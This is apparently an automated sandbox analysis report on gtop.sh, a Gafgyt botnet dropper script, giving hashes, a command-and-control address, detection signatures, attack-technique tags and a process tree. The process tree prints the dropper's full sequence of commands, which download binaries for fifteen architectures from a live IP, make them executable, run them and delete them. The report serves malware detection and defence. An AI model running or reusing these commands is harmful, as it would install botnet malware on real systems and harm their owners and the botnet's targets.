Analysis
-
max time kernel
104s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
23-12-2024 04:11
Static task
static1
Behavioral task
behavioral1
Sample
gtop.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
gtop.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
gtop.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
gtop.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
gtop.sh
-
Size
2KB
-
MD5
38530bb2fc22c035260c8a4fb33ee8ba
-
SHA1
a442c5ef953468e28f7da8d1bae9428f571dc587
-
SHA256
1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b
-
SHA512
b7d21f550985a44d48484f62b010ecb22d5a0474b56470f0c4cc323ea6ac7023cda4486fc5ade21392ed7841f8f520e9c11a903897e4f494b796b5b579e27dc7
Malware Config
Extracted
gafgyt
154.213.186.115:4444
Signatures
-
Detected Gafgyt variant 15 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt behavioral1/files/fstream-2.dat family_gafgyt behavioral1/files/fstream-3.dat family_gafgyt behavioral1/files/fstream-4.dat family_gafgyt behavioral1/files/fstream-5.dat family_gafgyt behavioral1/files/fstream-6.dat family_gafgyt behavioral1/files/fstream-7.dat family_gafgyt behavioral1/files/fstream-8.dat family_gafgyt behavioral1/files/fstream-9.dat family_gafgyt behavioral1/files/fstream-10.dat family_gafgyt behavioral1/files/fstream-11.dat family_gafgyt behavioral1/files/fstream-12.dat family_gafgyt behavioral1/files/fstream-13.dat family_gafgyt behavioral1/files/fstream-14.dat family_gafgyt behavioral1/files/fstream-15.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1534 chmod 1546 chmod 1508 chmod 1523 chmod 1528 chmod 1577 chmod 1518 chmod 1540 chmod 1552 chmod 1562 chmod 1513 chmod 1557 chmod 1567 chmod 1572 chmod 1582 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/jackmymips 1509 jackmymips /tmp/jackmymips64 1514 jackmymips64 /tmp/jackmymipsel 1519 jackmymipsel /tmp/jackmysh4 1524 jackmysh4 /tmp/jackmyx86 1529 jackmyx86 /tmp/jackmyi486 1535 jackmyi486 /tmp/jackmyi586 1541 jackmyi586 /tmp/jackmyi686 1547 jackmyi686 /tmp/jackmypowerpc 1553 jackmypowerpc /tmp/jackmym86k 1558 jackmym86k /tmp/jackmysparc 1563 jackmysparc /tmp/jackmyarmv4 1568 jackmyarmv4 /tmp/jackmyarmv4tl 1573 jackmyarmv4tl /tmp/jackmyarmv5 1578 jackmyarmv5 /tmp/jackmyarmv6 1583 jackmyarmv6 -
Reads system routing table 1 TTPs 4 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route jackmyx86 File opened for reading /proc/net/route jackmyi486 File opened for reading /proc/net/route jackmyi586 File opened for reading /proc/net/route jackmyi686 -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route jackmyx86 File opened for reading /proc/net/route jackmyi486 File opened for reading /proc/net/route jackmyi586 File opened for reading /proc/net/route jackmyi686 -
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1512 wget 1516 rm 1517 wget 1521 rm 1504 wget 1509 jackmymips 1511 rm 1514 jackmymips64 1519 jackmymipsel -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jackmyi486 wget File opened for modification /tmp/jackmyi686 wget File opened for modification /tmp/jackmym86k wget File opened for modification /tmp/jackmyi586 wget File opened for modification /tmp/jackmyarmv4 wget File opened for modification /tmp/jackmyarmv4tl wget File opened for modification /tmp/jackmysh4 wget File opened for modification /tmp/jackmyx86 wget File opened for modification /tmp/jackmypowerpc wget File opened for modification /tmp/jackmysparc wget File opened for modification /tmp/jackmyarmv5 wget File opened for modification /tmp/jackmymips wget File opened for modification /tmp/jackmymips64 wget File opened for modification /tmp/jackmymipsel wget File opened for modification /tmp/jackmyarmv6 wget
Processes
-
/tmp/gtop.sh/tmp/gtop.sh1⤵PID:1503
-
/usr/bin/wgetwget http://154.213.186.115/jackmymips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1504
-
-
/bin/chmodchmod +x jackmymips2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/jackmymips./jackmymips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1509
-
-
/bin/rmrm -rf jackmymips2⤵
- System Network Configuration Discovery
PID:1511
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmymips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1512
-
-
/bin/chmodchmod +x jackmymips642⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/jackmymips64./jackmymips642⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1514
-
-
/bin/rmrm -rf jackmymips642⤵
- System Network Configuration Discovery
PID:1516
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmymipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1517
-
-
/bin/chmodchmod +x jackmymipsel2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/jackmymipsel./jackmymipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1519
-
-
/bin/rmrm -rf jackmymipsel2⤵
- System Network Configuration Discovery
PID:1521
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmysh42⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/chmodchmod +x jackmysh42⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/jackmysh4./jackmysh42⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm -rf jackmysh42⤵PID:1526
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyx862⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod +x jackmyx862⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/jackmyx86./jackmyx862⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1529
-
-
/bin/rmrm -rf jackmyx862⤵PID:1532
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyi4862⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/chmodchmod +x jackmyi4862⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/jackmyi486./jackmyi4862⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1535
-
-
/bin/rmrm -rf jackmyi4862⤵PID:1538
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyi5862⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/chmodchmod +x jackmyi5862⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/jackmyi586./jackmyi5862⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1541
-
-
/bin/rmrm -rf jackmyi5862⤵PID:1544
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyi6862⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x jackmyi6862⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/jackmyi686./jackmyi6862⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1547
-
-
/bin/rmrm -rf jackmyi6862⤵PID:1550
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmypowerpc2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/chmodchmod +x jackmypowerpc2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/jackmypowerpc./jackmypowerpc2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm -rf jackmypowerpc2⤵PID:1555
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmym86k2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x jackmym86k2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/jackmym86k./jackmym86k2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm -rf jackmym86k2⤵PID:1560
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmysparc2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/chmodchmod +x jackmysparc2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/jackmysparc./jackmysparc2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm -rf jackmysparc2⤵PID:1565
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyarmv42⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/chmodchmod +x jackmyarmv42⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/jackmyarmv4./jackmyarmv42⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm -rf jackmyarmv42⤵PID:1570
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyarmv4tl2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/chmodchmod +x jackmyarmv4tl2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/jackmyarmv4tl./jackmyarmv4tl2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm -rf jackmyarmv4tl2⤵PID:1575
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyarmv52⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/chmodchmod +x jackmyarmv52⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/jackmyarmv5./jackmyarmv52⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm -rf jackmyarmv52⤵PID:1580
-
-
/usr/bin/wgetwget http://154.213.186.115/jackmyarmv62⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/chmodchmod +x jackmyarmv62⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/jackmyarmv6./jackmyarmv62⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm -rf jackmyarmv62⤵PID:1585
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
167KB
MD5d00be981681e272f97c7ae6e0d72a679
SHA176e316df4e70371cc1a0e1a718c4a148564ca13b
SHA2562359a71e62d525ef2cc8041db19e15a51eb3201692869b7a75bd6d9977b84f08
SHA5120ab8f509f9197c2130bb7bc36bc5de6f23d6c55a793158d1c8b2e9eff49d8b8bc69ac7edb994f78728f72de6e874af47bd7a84e36162e79dadcc0c7ba75271e0
-
Filesize
166KB
MD58701802700912d0bc573d75d76bf4d30
SHA1bcf66b86849b6c6a5977a102c67737723d9ace0d
SHA256d338bd034f546e5756e2ebb0def390b32a13565a10e821ca8eee2eaa5468c07f
SHA51274bd2a2a81f2dec0fa278d1aa02bfa20be97884fb7ccd2ccf4aaf2dfa07cbcc5314f7d1125c730a5209ef3abbeec7cc9e672fe32e8359522c9487f28f8bd5c7f
-
Filesize
166KB
MD5795d887687193140ee04711c54574ab5
SHA135ac21f15d9be9c9da1b22acefefbf466ad154f4
SHA256f25d5d4a126acb25c26694b0d37455b757f6607a9bc33ee4a71f50b5506292a5
SHA5125c687bcb950fae7738c4b65f67a0612f1f86338b92867deb1611b9483dfbc04b202edd158a9108be5d55350b717a64922050965e48907ff8066542eb4534c614
-
Filesize
166KB
MD5f8267e8d44d86203d2560d280b66bd36
SHA15a1c5e5caeacdf01af8c44bcbe1625b7ad0eb0fb
SHA256a3360319b5713fa0352e837562c56a8fa34ff656a506763ca7e809d120e57980
SHA5127b7398311260831b8428e76c46f31297dbfcae42c5c41c87c0644892854b0477406641bd0d5e7af03c7190a8fac38ac0c3cded5341f4f07dbfb974b8275b934e
-
Filesize
126KB
MD537bc4b1d4fce9500ee4fee154e61d9e6
SHA16fddc8858547e60672cca66857ceb7293638a057
SHA25672071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c
SHA5123db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb
-
Filesize
135KB
MD54ca387e1408f29f6ed1979acfb671f82
SHA13467879b5fd631a5884f947ba013d61ea8a33c91
SHA2561f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d
SHA51218995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738
-
Filesize
139KB
MD51aeb2935aec67978bfdab8243470b577
SHA1b26b260d86609e9c758279c59eb8caec53fd0f69
SHA256936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57
SHA5123843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce
-
Filesize
155KB
MD5a26f6fdf41bb8e4034409fb84adc83ba
SHA18c03a273bdd2e8f54994d0d061fe259a2968ff41
SHA2567911664055520934019ddfa554219500fa5a038268c828a02b05aa6ad198fbbd
SHA512dcdf2befd602bee0a56c2a05e01171cb24aada733531e479b157ccb8a6d494c3c1fcaa261b813e4eedc498bdc3ba5664e6e3b4c42ce713cfe2d5a5dcc27cb897
-
Filesize
199KB
MD5f2ab2725ea6c883a5c608bc365c41fe5
SHA1454d6983d9a7bb59aa0441b2c2cc805a97738e66
SHA256531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d
SHA512572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26
-
Filesize
244KB
MD589655c0a64c3552ee71dc901a3561ad1
SHA18a488927882c18b5a35da06c6428f8707d4314ad
SHA25608d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04
SHA51223c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f
-
Filesize
199KB
MD5caabd697c443462f0a04d6b30529df58
SHA14fcb97074d1971ebfa482aad5edf208b43b6d819
SHA2565259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf
SHA512abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8
-
Filesize
150KB
MD529f174a35d868d69945c412c159184dd
SHA17ac1d35bdbe15fed8443341de0875579ec8099d0
SHA256b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b
SHA5126047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899
-
Filesize
146KB
MD52a8e0da501cea8f8d32893a5fd6c9aab
SHA129b2be373b4155632926b9656861bebd53264473
SHA25617f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1
SHA51264764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7
-
Filesize
167KB
MD58ad1c29bcb5557ee83c64f35b9b46b2e
SHA10fabfb4c79ff14fdacef575b3728561a8e557a77
SHA256d44b79302f6bb77b6432c8074582a5e2df2c9d24404bc3dc17441f59e22284ca
SHA512a3c8a68708056e0cd4aa9d5cae1c865eb381ec62f316aab48e38cdcb4ef0be3abc8daf30e4c888766211c2eaa433c7fe15e85efd3b14b35a5f3de5ab6e2ac2e6
-
Filesize
156KB
MD5afcb3a143b9f4e3a985c3eeb2e2ae4c8
SHA1295f0e0380f71feb1c8911e29882db6a792bbd58
SHA256fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c
SHA512b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08